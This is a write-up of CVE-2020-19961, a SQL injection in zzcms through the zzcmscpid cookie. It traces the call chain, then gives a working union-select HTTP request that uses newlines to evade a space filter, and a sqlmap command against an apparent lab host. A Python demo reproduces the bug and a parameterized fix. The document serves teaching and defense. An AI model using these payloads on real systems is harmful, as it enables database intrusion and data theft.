CVE-2020-19961 (SQL injection in zzcms)

zzcms 2019: SQL injection in subzs.php

Affected file:

 zs/subzs.php

Where the injection is:

In the showcookiezs function, the SQL statement on line 16 concatenates the zzcmscpid value received from the cookie straight into the query, without quoting it.

Looking for callers of showcookiezs: it is called from the fix function, and only when the label being processed is cookiezs. So the next step is to find the callers of fix.

fix is called from the showlabel function on line 12 of label.php.

So what remains is to find the callers of showlabel whose $str argument carries the cookiezs label.

Two call sites match: zs/search.php and zs/zs_list.php.

zs/search.php

$fp="../template/".$siteskin."/zs_search.htm";  // template file chosen by $siteskin
$f = fopen($fp,'r');
$strout = fread($f,filesize($fp));
$strout=showlabel($strout);  // expands the template labels; this template carries cookiezs, so fix() reaches showcookiezs()
echo $strout;

zs_list.php

$fp="../template/".$siteskin."/".$skin;  // template file chosen by $siteskin and $skin
$f = fopen($fp,'r');
$strout = fread($f,filesize($fp));
$strout=showlabel($strout);  // same chain: cookiezs label -> fix() -> showcookiezs()
echo $strout;

The constructed PoC is below. The payload sits in the zzcmscpid cookie: 1,1) union select user(),1,version( . The ")" after "1,1" and the unterminated "version(" are there so that the query's own parentheses still balance once the payload is spliced in, the union selects three columns, and %0a (a newline) is used in place of spaces, which MySQL accepts as whitespace.

GET /zs/search.php HTTP/1.1
Host: eci-2ze2ipiauqlmkbuye5j3.cloudeci1.ichunqiu.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: keyword=1; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1685254512,1685372961,1686744961; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1686744961; __51cke__=; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; PHPSESSID=nrehljkae20keni8guois7tvp7; tablename=zzcms_zxclass; __tins__713776=%7B%22sid%22%3A%201686745083272%2C%20%22vd%22%3A%2063%2C%20%22expires%22%3A%201686748313743%7D; __51laig__=63;zzcmscpid=1,1) union%0aselect%0auser(),1,version(;
Connection: close
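To make the chain above concrete, here is an added example (not zzcms code) that models the showcookiezs bug with an in-memory SQLite database, runs the page's union payload against it, and shows the hardened form. Everything in it is an assumption: the table zs(id, title, company) and its rows are constructed sample data standing in for zzcms's MySQL schema; the query shape "... WHERE id IN (<cookie>)" with three selected columns is inferred from the payload's "1,1) union select ..., version(" structure rather than copied from subzs.php; MySQL's user() and version() are replaced by a literal and sqlite_version(); and the space-rejecting filter is purely illustrative, not zzcms's own input filtering.

```python
"""Added example (not zzcms code): the zzcmscpid cookie concatenated into
SQL, the page's union payload run against it, and a hardened version.

Assumptions: an in-memory SQLite table zs(id, title, company) stands in for
zzcms's MySQL schema; the query shape "... WHERE id IN (<cookie>)" with three
selected columns is inferred from the payload's "1,1) union select ...,
version(" structure rather than copied from subzs.php; the space-rejecting
filter is illustrative only."""
import re
import sqlite3


def make_db():
    """Constructed sample data standing in for the zzcms zs table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE zs (id INTEGER PRIMARY KEY, title TEXT, company TEXT)")
    con.executemany(
        "INSERT INTO zs VALUES (?, ?, ?)",
        [(1, "product one", "acme"), (2, "product two", "beta")],
    )
    return con


def showcookiezs_vulnerable(con, zzcmscpid):
    """The bug described on the page: the cookie value is pasted into the
    SQL text with no quoting and no validation."""
    sql = "SELECT id, title, company FROM zs WHERE id IN (" + zzcmscpid + ")"
    return con.execute(sql).fetchall()


def naive_space_filter(value):
    """Illustrative blacklist (an assumption, not zzcms's real filter): it
    rejects spaces, which is exactly what the PoC's %0a newlines sidestep."""
    if " " in value:
        raise ValueError("space not allowed")
    return value


_ID_LIST = re.compile(r"\d+(,\d+)*")


def showcookiezs_fixed(con, zzcmscpid):
    """Hardened form: accept only a comma-separated list of integers, then
    bind each id as a parameter so the cookie can never become SQL syntax."""
    if not _ID_LIST.fullmatch(zzcmscpid):
        raise ValueError("zzcmscpid must be a comma-separated list of integers")
    ids = [int(x) for x in zzcmscpid.split(",")]
    placeholders = ",".join("?" * len(ids))
    sql = f"SELECT id, title, company FROM zs WHERE id IN ({placeholders})"
    return con.execute(sql, ids).fetchall()


def fixed_rejects(con, zzcmscpid):
    """True if the hardened function refuses the value."""
    try:
        showcookiezs_fixed(con, zzcmscpid)
    except ValueError:
        return True
    return False


# The page's payload with %0a decoded to newlines (what the browser sends) and
# MySQL's user()/version() replaced by a literal and sqlite_version().
PAYLOAD = "1,1)\nunion\nselect\n'dbuser',1,sqlite_version("


def leaked_rows(rows):
    """Rows contributed by the injected SELECT rather than by the zs table."""
    return [r for r in rows if r[0] == "dbuser"]


if __name__ == "__main__":
    con = make_db()
    print("normal:", showcookiezs_vulnerable(con, "1,2"))
    # No space in the payload, so a space blacklist lets it through ...
    rows = showcookiezs_vulnerable(con, naive_space_filter(PAYLOAD))
    # ... and the union row carries the injected values out with the real ones.
    print("injected:", leaked_rows(rows))
    print("hardened rejects payload:", fixed_rejects(con, PAYLOAD))
```

The same fix applies to the PHP original: validate the cookie as a list of integers (or cast every element with intval) before it is joined into the IN() list, or bind the ids with a prepared statement, so that the query's syntax no longer depends on anything the client sends.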

The request handed to sqlmap is the same one with a harmless zzcmscpid=1, so that sqlmap supplies its own payloads:

GET /zs/search.php HTTP/1.1
Host: eci-2ze2ipiauqlmkbuye5j3.cloudeci1.ichunqiu.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: keyword=1; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1685254512,1685372961,1686744961; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1686744961; __51cke__=; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; PHPSESSID=nrehljkae20keni8guois7tvp7; tablename=zzcms_zxclass; __tins__713776=%7B%22sid%22%3A%201686745083272%2C%20%22vd%22%3A%2063%2C%20%22expires%22%3A%201686748313743%7D; __51laig__=63;zzcmscpid=1
Connection: close

Save that request as 2.txt and point sqlmap at the cookie parameter:

sqlmap.py -r P:2.txt -p zzcmscpid --level=2 --dbs

-p zzcmscpid limits testing to that cookie, and --level=2 is required because sqlmap only tests Cookie header values from level 2 upward.
